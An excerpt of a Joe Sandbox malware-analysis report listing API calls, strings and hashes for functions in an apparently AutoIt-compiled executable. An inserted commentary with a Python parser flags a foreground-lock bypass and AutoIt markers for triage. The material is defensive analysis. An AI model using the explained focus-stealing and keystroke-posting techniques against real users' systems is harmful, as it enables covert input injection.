                                                                                          • Instruction ID: cf5237ead9178137421241ba4763476990ac919c12b5de4495d1c20f4e3090f4
                                                                                          • Opcode Fuzzy Hash: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
                                                                                          • Instruction Fuzzy Hash: B0316FB1504341AFD768EF28DC88A7BB7A9EF9D310F14182EF44197250D7B89C44CB69
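The records in this section are Joe Sandbox's per-function listings: each one carries the Win32 calls the function makes (with observed arguments and call-site addresses), the strings it references and the similarity IDs. The record just above is the one worth automating a check for: GetForegroundWindow, GetWindowThreadProcessId, then AttachThreadInput with fAttach=1 followed by AttachThreadInput with fAttach=0 is the standard way a process bypasses the Windows foreground lock to grab keyboard focus. The Python below is an added example (mine, not part of the report or of Joe Sandbox's tooling) that parses this record format and applies two heuristics of my own: the focus-steal sequence just described, and a string check for AutoIt3 interpreter artifacts (CLASSNN/REGEXPCLASS control descriptors, the FOR..IN loop runtime errors, the @COM_EVENTOBJ macro), which is my identification; the report does not name AutoIt in this section. The input is a constructed excerpt, trimmed from three records on this page.

```python
"""Parse Joe Sandbox per-function records (APIs / Strings / Similarity) and triage them.
Added example, not from the report or Joe Sandbox; the flagging rules are the author's heuristics."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Constructed input: three records from this report, trimmed to the lines the parser uses.
SAMPLE = """\
APIs
• GetCurrentThreadId.KERNEL32 ref: 004377D7
• GetForegroundWindow.USER32(00000000,?,?,?,?,0045FDE0,?,?,00000001), ref: 004377EB
• GetWindowThreadProcessId.USER32(00000000), ref: 004377F8
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 00437809
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 0043788D
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
APIs
  • Part of subcall function 00467626: VariantCopy.OLEAUT32(00000000,00479BD3), ref: 00467670
  • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
Strings
Similarity
• API ID: Variant$Copy$ClearInit$ErrorLast_memset
• String ID: F$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
APIs
• VariantTimeToSystemTime.OLEAUT32 ref: 0045EAEB
• __swprintf.LIBCMT ref: 0045EB1F
Strings
• %4d%02d%02d%02d%02d%02d, xrefs: 0045EB19
Similarity
• API ID: Variant$InitTime$ClearCopyFromSystem__swprintf
• String ID: %4d%02d%02d%02d%02d%02d
"""

HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]{8})$"
)

@dataclass
class ApiCall:
    api: str
    module: str
    args: list[str]          # as printed by the sandbox; "?" means the value was not observed
    ref: str                 # call-site address
    subcall_of: str | None   # callee address for "Part of subcall function" lines, else None

@dataclass
class FunctionRecord:
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)
    api_id: str = ""
    string_id: str = ""

def parse_records(text: str) -> list[FunctionRecord]:
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in HEADERS:
            # "Similarity" is the last block of a record, so any header after it opens a new record.
            if rec is None or section == "Similarity":
                rec = FunctionRecord()
                records.append(rec)
            section = line
        elif line.startswith("•") and rec is not None:
            body = line.lstrip("•").strip()
            if section == "APIs" and (m := API_RE.match(body)):
                args = m["args"].split(",") if m["args"] is not None else []
                rec.apis.append(ApiCall(m["api"], m["mod"], args, m["ref"], m["sub"]))
            elif section == "Strings":
                rec.strings.append(body.split(", xrefs:")[0])
            elif section == "Similarity":
                key, _, value = (s.strip() for s in body.partition(":"))
                if key == "API ID":
                    rec.api_id = value
                elif key == "String ID":
                    rec.string_id = value
    return records

def calls_focus_steal(rec: FunctionRecord) -> bool:
    # Heuristic: foreground thread looked up, AttachThreadInput(fAttach=1) then later (fAttach=0).
    names = {c.api for c in rec.apis}
    if not {"GetForegroundWindow", "GetWindowThreadProcessId", "AttachThreadInput"} <= names:
        return False
    attached = False
    for c in rec.apis:
        if c.api == "AttachThreadInput" and len(c.args) >= 3:
            if c.args[2] == "00000001":
                attached = True
            elif c.args[2] == "00000000" and attached:
                return True
    return False

# AutoIt3 interpreter strings (author's identification, not the report's).
AUTOIT_MARKERS = ("CLASSNN", "REGEXPCLASS", "FOR..IN loop", "@COM_EVENTOBJ")

def autoit_markers(rec: FunctionRecord) -> list[str]:
    texts = [rec.string_id, *rec.strings]
    return [m for m in AUTOIT_MARKERS if any(m in t for t in texts)]
```

To run it against a full report, replace `SAMPLE` with the pasted function listing; the "Associated" and "Memory Dump Source" lines are ignored, and subcall lines keep the callee address in `subcall_of` so a hit can be traced to the right function. Both rules are coarse triage heuristics, not detections: legitimate automation tools use the same AttachThreadInput sequence, so a hit is a pointer for the analyst, not a verdict.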
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: __wcsicoll
                                                                                          • String ID: 0%d$DOWN$OFF
                                                                                          • API String ID: 3832890014-468733193
                                                                                          • Opcode ID: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
                                                                                          • Instruction ID: 3901981f80fa7430cd77b89167089bc3925961a07aad88d0cc2f25a35af8916b
                                                                                          • Opcode Fuzzy Hash: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
                                                                                          • Instruction Fuzzy Hash: B7F1D8614083856DEB21EB21C845BAF7BE85F95309F08092FF98212193D7BCD68DC76B
                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32(00000000), ref: 0045E959
                                                                                          • VariantCopy.OLEAUT32(00000000), ref: 0045E963
                                                                                          • VariantClear.OLEAUT32 ref: 0045E970
                                                                                          • VariantTimeToSystemTime.OLEAUT32 ref: 0045EAEB
                                                                                          • __swprintf.LIBCMT ref: 0045EB1F
                                                                                          • VarR8FromDec.OLEAUT32(?,?), ref: 0045EB61
                                                                                          • VariantInit.OLEAUT32(00000000), ref: 0045EBE7
                                                                                          Strings
                                                                                          • %4d%02d%02d%02d%02d%02d, xrefs: 0045EB19
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$InitTime$ClearCopyFromSystem__swprintf
                                                                                          • String ID: %4d%02d%02d%02d%02d%02d
                                                                                          • API String ID: 43541914-1568723262
                                                                                          • Opcode ID: 14db4cabc5e1b0f67770c810f21e70b33e6c91423244c68acaef5aa9588cc2da
                                                                                          • Instruction ID: db8708ae94f177a13b26e6bf0e0b18ed2eb17208bc27bd00c320e315e6f9d40a
                                                                                          • Opcode Fuzzy Hash: 14db4cabc5e1b0f67770c810f21e70b33e6c91423244c68acaef5aa9588cc2da
                                                                                          • Instruction Fuzzy Hash: ABC1F4BB1006019BC704AF06D480666F7A1FFD4322F14896FED984B341DB3AE95ED7A6
                                                                                          APIs
                                                                                          • InterlockedDecrement.KERNEL32(004A7CAC), ref: 0042FE66
                                                                                          • Sleep.KERNEL32(0000000A), ref: 0042FE6E
                                                                                          • InterlockedDecrement.KERNEL32(004A7CAC), ref: 0042FF5D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: DecrementInterlocked$Sleep
                                                                                          • String ID: 0vH$0vH$4RH0vH$@COM_EVENTOBJ
                                                                                          • API String ID: 2250217261-3412429629
                                                                                          • Opcode ID: 259a8d3968bbabb0e43eb8f22aa2195a71f663abf8571a10d24c6569a0fcc496
                                                                                          • Instruction ID: 990b5f35a06538e4ae7b6c94f393f4a5fafaaf51bfa382c75dcb300f2d234fa3
                                                                                          • Opcode Fuzzy Hash: 259a8d3968bbabb0e43eb8f22aa2195a71f663abf8571a10d24c6569a0fcc496
                                                                                          • Instruction Fuzzy Hash: E0B1C0715083009FC714EF54C990A5FB3E4AF98304F508A2FF495972A2DB78ED4ACB9A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                          • API String ID: 0-1603158881
                                                                                          • Opcode ID: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
                                                                                          • Instruction ID: 1d39c91c6ba170ccd8bd44326015c92659356e06a413e753493f98454e3169a0
                                                                                          • Opcode Fuzzy Hash: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
                                                                                          • Instruction Fuzzy Hash: 49A1D3B14043459BCB20EF50CC81BDE37A4AF94348F44891FF9896B182EF79A64DC76A
                                                                                          APIs
                                                                                          • _memset.LIBCMT ref: 00479D1F
                                                                                          • VariantInit.OLEAUT32(?), ref: 00479F06
                                                                                          • VariantClear.OLEAUT32(?), ref: 00479F11
                                                                                          • VariantInit.OLEAUT32(?), ref: 00479DF7
                                                                                            • Part of subcall function 00467626: VariantInit.OLEAUT32(00000000), ref: 00467666
                                                                                            • Part of subcall function 00467626: VariantCopy.OLEAUT32(00000000,00479BD3), ref: 00467670
                                                                                            • Part of subcall function 00467626: VariantClear.OLEAUT32 ref: 0046767D
                                                                                          • VariantClear.OLEAUT32(?), ref: 00479F9C
                                                                                            • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                            • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                            • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                            • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$Copy$ClearInit$ErrorLast_memset
                                                                                          • String ID: F$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                          • API String ID: 665237470-60002521
                                                                                          • Opcode ID: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
                                                                                          • Instruction ID: 799f1794578ead7d01377608c22e1fb401aa4fc5ffca8a64c02b8280356d09a3
                                                                                          • Opcode Fuzzy Hash: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
                                                                                          • Instruction Fuzzy Hash: 6091B272204341AFD720DF64D880EABB7E9EFC4314F50891EF28987291D7B9AD45C766
                                                                                          APIs
                                                                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D5A
                                                                                          • DestroyWindow.USER32(?), ref: 0042A751
                                                                                          • UnregisterHotKey.USER32(?), ref: 0042A778
                                                                                          • FreeLibrary.KERNEL32(?), ref: 0042A822
                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0042A854
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
Similarity
• API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
• String ID: close all$Wu
• API String ID: 4174999648-1790509019
• Opcode ID: ddf39f1eda455a1c63d5a7d3271f56cd3ed42d138f3b783cbb3ca1597947a384
• Instruction ID: e23b5dd52123a376b0379481fe8be5d2f02d07e70979f80a1c72d587d5a24a2c
• Opcode Fuzzy Hash: ddf39f1eda455a1c63d5a7d3271f56cd3ed42d138f3b783cbb3ca1597947a384
• Instruction Fuzzy Hash: FFA17075A102248FCB20EF55CC85B9AB3B8BF44304F5044EEE90967291D779AE85CF9D
APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046A84D
Similarity
• API ID: ConnectRegistry_wcslen
• String ID: HH
• API String ID: 535477410-2761332787
• Opcode ID: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
• Instruction ID: 68d8ff7817732ac0dd8275009c421e29eb5870de2046e22f9b94a35ba54c9d9f
• Opcode Fuzzy Hash: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
• Instruction Fuzzy Hash: FE617FB56083009FD304EF65C981F6BB7E4AF88704F14891EF681A7291D678ED09CB97
APIs
• _memset.LIBCMT ref: 0045F317
• GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F367
• IsMenu.USER32(?), ref: 0045F380
• CreatePopupMenu.USER32 ref: 0045F3C5
• GetMenuItemCount.USER32(?), ref: 0045F42F
• InsertMenuItemW.USER32(?,?,00000001,?), ref: 0045F45B
Similarity
• API ID: Menu$Item$CountCreateInfoInsertPopup_memset
• String ID: 0$2
• API String ID: 3311875123-3793063076
• Opcode ID: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
• Instruction ID: 6c7ab59355789d00cbd42ef361c1bd9312a1bc9220e92816940967e3bd29aecc
• Opcode Fuzzy Hash: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
• Instruction Fuzzy Hash: E451CF702043409FD710CF69D888B6BBBE4AFA5319F104A3EFD9586292D378994DCB67
APIs
• GetModuleHandleW.KERNEL32(00000000,004A8E80,00000100,00000100,?,C:\Users\user\Desktop\XhAQ0Rk63O.exe), ref: 0043719E
• LoadStringW.USER32(00000000), ref: 004371A7
• GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004371BD
• LoadStringW.USER32(00000000), ref: 004371C0
• _printf.LIBCMT ref: 004371EC
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 00437208
Strings
• %s (%d) : ==> %s: %s %s, xrefs: 004371E7
• C:\Users\user\Desktop\XhAQ0Rk63O.exe, xrefs: 00437189
Similarity
• API ID: HandleLoadModuleString$Message_printf
• String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\XhAQ0Rk63O.exe
• API String ID: 220974073-3236874046
• Opcode ID: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
• Instruction ID: cc9e6972dbc5209964c20f0f7d1f7455a13934f6c555fd98bc0bf92a0502fb90
• Opcode Fuzzy Hash: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
• Instruction Fuzzy Hash: F7014FB2A543447AE620EB549D06FFB365CABC4B01F444C1EB794A60C0AAF865548BBA
Similarity
• Opcode ID: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
• Instruction ID: 20732dcab93056f759d0b04a6df1a57780e33876730225f1fefd21ccf2a16f59
• Opcode Fuzzy Hash: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
• Instruction Fuzzy Hash: 36519070200301ABD320DF29CC85F5BB7E8EB48715F540A1EF995E7292D7B4E949CB29
APIs
  • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\XhAQ0Rk63O.exe,?,C:\Users\user\Desktop\XhAQ0Rk63O.exe,004A8E80,C:\Users\user\Desktop\XhAQ0Rk63O.exe,0040F3D2), ref: 0040FFCA
  • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
• lstrcmpiW.KERNEL32(?,?), ref: 0045355E
• MoveFileW.KERNEL32(?,?), ref: 0045358E
Similarity
• API ID: File$AttributesFullMoveNamePathlstrcmpi
• API String ID: 978794511-0
• Opcode ID: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
• Instruction ID: dcad70f49e32ae1adaf0c812d378eb0bba467e0a617048934f4a65f03e3a0b24
• Opcode Fuzzy Hash: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
• Instruction Fuzzy Hash: 665162B25043406AC724EF61D885ADFB3E8AFC8305F44992EB94992151E73DD34DC767
Similarity
• Opcode ID: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
• Instruction ID: b1e2397247e50d0c7000acf5a2db8631a214b417b603bec0598d849dd48054e0
• Opcode Fuzzy Hash: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
• Instruction Fuzzy Hash: E54128332402806BE320A75DB8C4ABBFB98E7A2362F50443FF18196520D76678C5D339
APIs
  • Part of subcall function 0044593E: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 0044595D
  • Part of subcall function 0044593E: GetCurrentThreadId.KERNEL32 ref: 00445964
  • Part of subcall function 0044593E: AttachThreadInput.USER32(00000000,?,00000001,00478FA7), ref: 0044596B
• MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D15
• PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00445D35
• Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00445D3F
• MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D45
• PostMessageW.USER32(00000000,00000100,00000027,00000000), ref: 00445D66
• Sleep.KERNEL32(00000000), ref: 00445D70
• MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D76
• PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00445D8B
• Sleep.KERNEL32(00000000,?,00000101,00000027,00000000), ref: 00445D8F
Similarity
• API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
• API String ID: 2014098862-0
• Opcode ID: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
• Instruction ID: b085f3065cf9cd100f04f322da00d4b037e108fc79bf5967fdabce1cd6d2e74b
• Opcode Fuzzy Hash: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
• Instruction Fuzzy Hash: 7B116971790704B7F620AB958C8AF5A7399EF88B11F20080DF790AB1C1C9F5E4418B7C
Similarity
• API ID: AddressProc_malloc$_strcat_strlen
• String ID: AU3_FreeVar
• API String ID: 2184576858-771828931
• Opcode ID: 111e65442873bd7cbffe48700b84114c079de58427b558a04ef4a5d95244f0f0
• Instruction ID: c940ad03d776ce5ee908f8b881b33357b51647545ffc53e819ca791e1fdac2da
• Opcode Fuzzy Hash: 111e65442873bd7cbffe48700b84114c079de58427b558a04ef4a5d95244f0f0
• Instruction Fuzzy Hash: EDA18DB5604205DFC300DF59C480A2AB7E5FFC8319F1489AEE9554B362D739ED89CB8A
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AA5A
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AA8D
• InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0044AAF9
• InternetSetOptionW.WININET(00000000,0000001F,?,00000004), ref: 0044AB11
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB20
• HttpQueryInfoW.WININET(00000000,00000005,?,00000000,00000000), ref: 0044AB61
  • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                                          Similarity
                                                                                          • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                                          • String ID:
                                                                                          • API String ID: 1291720006-3916222277
                                                                                          • Opcode ID: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
                                                                                          • Instruction ID: 782b6278bf246bef60821ca34847c3ce69a0d92f774604c9678bedd135ce19ea
                                                                                          • Opcode Fuzzy Hash: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
                                                                                          • Instruction Fuzzy Hash: 9C51E6B12803016BF320EB65CD85FBBB7A8FB89704F00091EF74196181D7B9A548C76A
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: ErrorLastselect
                                                                                          • String ID: HH
                                                                                          • API String ID: 215497628-2761332787
                                                                                          • Opcode ID: 81123ba87c51c271d749794d4387e1d0575ba96382d8685f9443cecf8545e782
                                                                                          • Instruction ID: a252b81ccbce03d1e7b1b0efababa2c0a0929072778302a7b1202b90a7697d70
                                                                                          • Opcode Fuzzy Hash: 81123ba87c51c271d749794d4387e1d0575ba96382d8685f9443cecf8545e782
                                                                                          • Instruction Fuzzy Hash: BF51E4726043005BD320EB65DC42F9BB399EB94324F044A2EF558E7281EB79E944C7AA
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: __snwprintf__wcsicoll_wcscpy
                                                                                          • String ID: , $$0vH$AUTOITCALLVARIABLE%d$CALLARGARRAY
                                                                                          • API String ID: 1729044348-3708979750
                                                                                          • Opcode ID: 19d8c814bf70bb05cadf871115a188aa6336bc7b5c41e4e48777219efcb9f973
                                                                                          • Instruction ID: 823d0c4529048d9f890bbf28e75db1a658c609af9319d28fcdda535ef0d13f31
                                                                                          • Opcode Fuzzy Hash: 19d8c814bf70bb05cadf871115a188aa6336bc7b5c41e4e48777219efcb9f973
                                                                                          • Instruction Fuzzy Hash: E651A571514300ABD610EF65C882ADFB3A4EFC4348F048D2FF54967291D779E949CBAA
                                                                                          APIs
                                                                                            • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\XhAQ0Rk63O.exe,?,C:\Users\user\Desktop\XhAQ0Rk63O.exe,004A8E80,C:\Users\user\Desktop\XhAQ0Rk63O.exe,0040F3D2), ref: 0040FFCA
                                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 0044BC04
                                                                                          • MoveFileW.KERNEL32(?,?), ref: 0044BC38
                                                                                          • _wcscat.LIBCMT ref: 0044BCAA
                                                                                          • _wcslen.LIBCMT ref: 0044BCB7
                                                                                          • _wcslen.LIBCMT ref: 0044BCCB
                                                                                          • SHFileOperationW.SHELL32 ref: 0044BD16
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                                                          • String ID: \*.*
                                                                                          • API String ID: 2326526234-1173974218
                                                                                          • Opcode ID: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
                                                                                          • Instruction ID: 9e4979448571685848097db6772507fbfe8bfb8d1337cd0032b1ea927bdad9db
                                                                                          • Opcode Fuzzy Hash: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
                                                                                          • Instruction Fuzzy Hash: 4B3183B14083019AD724EF21C5D5ADFB3E4EFC8304F444D6EB98993251EB39E608D7AA
                                                                                          APIs
                                                                                            • Part of subcall function 00436328: _wcsncpy.LIBCMT ref: 0043633C
                                                                                          • _wcslen.LIBCMT ref: 004366DD
                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 00436700
                                                                                          • GetLastError.KERNEL32 ref: 0043670F
                                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00436727
                                                                                          • _wcsrchr.LIBCMT ref: 0043674C
                                                                                            • Part of subcall function 004366BE: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00000000), ref: 0043678F
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                                          • String ID: \
                                                                                          • API String ID: 321622961-2967466578
                                                                                          • Opcode ID: 3d3187412736f1559758a6cd6e40f0a594bd5d43c4c9ea1cccac3023e941b0f8
                                                                                          • Instruction ID: 68cadaa88695c7c006562ade17844284f7fc34f8e7e15af3b97584e331f528d6
                                                                                          • Opcode Fuzzy Hash: 3d3187412736f1559758a6cd6e40f0a594bd5d43c4c9ea1cccac3023e941b0f8
                                                                                          • Instruction Fuzzy Hash: 3C2148765003017ADB20A724EC47AFF33989F95764F90993EFD14D6281E779950882AE
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: __wcsnicmp
                                                                                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                          • API String ID: 1038674560-2734436370
                                                                                          • Opcode ID: dc7e98e38d8725b7134af3b864f32bf76aed1b78794146943df9d66deb8fb3e7
                                                                                          • Instruction ID: f72ce1d64a5a3b865947b719243e4701f1ba8c8209579f194a7ae3ad15c73224
                                                                                          • Opcode Fuzzy Hash: dc7e98e38d8725b7134af3b864f32bf76aed1b78794146943df9d66deb8fb3e7
                                                                                          • Instruction Fuzzy Hash: 1B21F87261161067E730B659DCC2BDB63985F65305F04406BF800AA247D6ADA98A83AA
                                                                                          APIs
                                                                                          • DeleteObject.GDI32(?), ref: 0044157D
                                                                                          • GetDC.USER32(00000000), ref: 00441585
                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00441590
                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 0044159B
